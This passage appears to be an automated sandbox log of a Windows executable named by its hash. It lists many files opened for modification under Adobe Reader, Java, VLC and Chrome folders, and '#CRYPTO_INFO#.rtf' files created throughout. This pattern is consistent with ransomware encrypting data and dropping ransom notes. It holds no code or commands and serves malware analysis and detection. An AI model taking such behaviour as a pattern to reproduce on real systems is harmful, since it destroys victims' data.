DC\Reader\WebResources\Resource0\static\js\plugins\pages-app\js\plugins\rhp\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.osgi.compatibility.state_1.0.1.v20140709-1414.jar 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\js\plugin.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\desktop-connector-files\js\nls\en-ae\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jre1.8.0_66\lib\deploy\messages_zh_CN.properties 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.equinox.p2.garbagecollector.nl_zh_4.4.0.v20140623020002.jar 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\duplicate.svg 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\images\themeless\inline-error-1x.png 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\unified-share\images\themes\dark\AddressBook2x.png 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\activity-badge\js\nls\ro-ro\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\desktop-connector-files\js\nls\hr-hr\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\com.jrockit.mc.rjmx.ui.zh_CN_5.5.0.165303.jar 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\modules\org-openide-util-enumerations.jar 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroApp\ENU\Certificates_R.aapp 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\as_IN\LC_MESSAGES\vlc.mo 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\app-center\js\nls\uk-ua\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer\images\themes\dark\new_icons_retina.png 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files\VideoLAN\VLC\locale\tet\LC_MESSAGES\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\[email protected] 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\add-account\images\bg_pattern_RHP.png 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\activity-badge\js\nls\pt-br\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.equinox.p2.artifact.repository.nl_zh_4.4.0.v20140623020002.jar 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\playlist\twitch.luac 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins3d\prc\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\exportpdfupsell-app\js\nls\nb-no\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\desktop-connector-files\js\nls\tr-tr\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Google\Update\Download\{8A69D345-D564-463C-AFF1-A69D9E530F96}\84.0.4147.89\84.0.4147.89_chrome_installer.exe 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-files\js\nls\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\exportpdfupsell-app\js\nls\en-ae\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\signatures\images\s_filter_18.svg 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\84.0.4147.89\Installer\chrome.7z 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\az\LC_MESSAGES\vlc.mo 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\Close2x.png 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\s_sendforcomments_18.svg 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\reviews\images\themes\dark\share_icons2x.png 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\images\themeless\Playstore\ru_get.svg 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\search-summary\js\nls\he-il\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\modules\locale\org-netbeans-modules-keyring_zh_CN.jar 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\walk-through\js\nls\sv-se\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\app-center\js\nls\cs-cz\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\uss-search\js\nls\en-il\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\js\nls\ru-ru\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\playlist\anevia_streams.luac 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\css\e4_basestyle.css 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-recent-files\js\nls\ko-kr\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\editpdf\images\rhp_world_icon.png 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\is\LC_MESSAGES\vlc.mo 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\add-account\js\nls\tr-tr\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\aicuc\js\nls\fr-fr\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\pages-app\images\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\search-summary\js\nls\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer-select\js\nls\ru-ru\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Windows Security\BrowserCore\en-US\BrowserCore.exe.mui 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\reviews\images\bun.png 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\84.0.4147.89\Locales\fr.pak 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\plugins\tracked-send\js\nls\en-gb\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\Localized_images\tr-tr\PlayStore_icon.svg 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.e4.core.services_1.2.1.v20140808-1251.jar 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\file_types\themes\dark\selection-actions.png 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.core.databinding.property.nl_ja_4.4.0.v20140623020002.jar 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\com.jrockit.mc.rjmx_5.5.0.165303\icons\hprof-16.png 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\app-center\js\nls\zh-cn\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\walk-through\images\themes\dark\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files\Java\jdk1.8.0_66\include\win32\bridge\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\org.eclipse.help_2.0.102.v20141007-2301\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\file_types\s_filetype_xd.svg 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\exportpdfupsell-app\images\themes\dark\rhp_world_icon_hover.png 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\generic-rhp-app\images\themes\dark\rhp_world_icon_hover_2x.png 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\s_gridview_selected-hover.svg 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\org.eclipse.help_2.0.102.v20141007-2301\feature.properties 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\upsell.png 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-recent-files\js\nls\nb-no\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\editpdf\js\plugins\rhp\editpdf-selector.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\ga\LC_MESSAGES\vlc.mo 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\plugins\tracked-send\js\nls\ca-es\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\core\dev\nls\fr-fr\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\app-center\js\nls\zh-tw\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\send-for-sign\images\cloud_secured_lg.png 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\add-account\js\nls\ca-es\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\plugins\tracked-send\js\nls\zh-cn\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.equinox.http.jetty_3.0.200.v20131021-1843.jar 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jre1.8.0_66\lib\images\cursors\win32_MoveNoDrop32x32.gif 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroApp\ENU\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\compare.png 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\include\win32\bridge\AccessBridgeCalls.h 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jre1.8.0_66\COPYRIGHT 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jre1.8.0_66\bin\tnameserv.exe 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\images\email\adc_logo.png 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\js\nls\ca-es\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\pages-app\js\nls\it-it\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.e4.ui.workbench.swt.nl_zh_4.4.0.v20140623020002.jar 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\s_gridview.svg 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sign-services-auth\js\nls\ko-kr\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\db\lib\derbyoptionaltools.jar 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.feature_3.9.0.v20140827-1444\asl-v20.txt 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\unified-share\js\nls\sk-sk\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\find-text-2x.png 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\uss-search\js\nls\en-gb\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\org.eclipse.rcp_4.4.0.v20141007-2301\META-INF\MANIFEST.MF 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\s_reminders_18.svg 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\s_folder-focus_32.svg 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer-select\css\main-selector.css 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files\VideoLAN\VLC\plugins\access\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\84.0.4147.89\Locales\am.pak 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\jre\lib\fontconfig.bfc 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\de_get.svg 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\signatures\images\themes\dark\s_thumbnailview_18.svg 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\unified-share\images\themes\dark\s_close2x.png 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\send-for-sign\js\nls\fr-fr\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Google\Chrome\Application\84.0.4147.89\VisualElements\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\files\dev\nls\ro-ro\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer-select\js\nls\sl-si\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\walk-through\images\themes\dark\checkmark.png 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\unified-share\js\nls\tr-tr\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\http\dialogs\offset_window.html 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files\VideoLAN\VLC\locale\co\LC_MESSAGES\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\jre\bin\javaw.exe 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\org.eclipse.babel.nls_eclipse_ja_4.4.0.v20140623020002\epl-v10.html 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jre1.8.0_66\bin\pack200.exe 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\images\dragHandle.png 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\reviews\images\themes\dark\dd_arrow_small.png 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\img\tools\themes\dark\check_2x.png 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\images\themeless\action_poster.jpg 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.e4.ui.workbench3.nl_ja_4.4.0.v20140623020002.jar 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\editpdf\js\nls\en-ae\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\img\themes\dark\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Mozilla Firefox\updater.exe 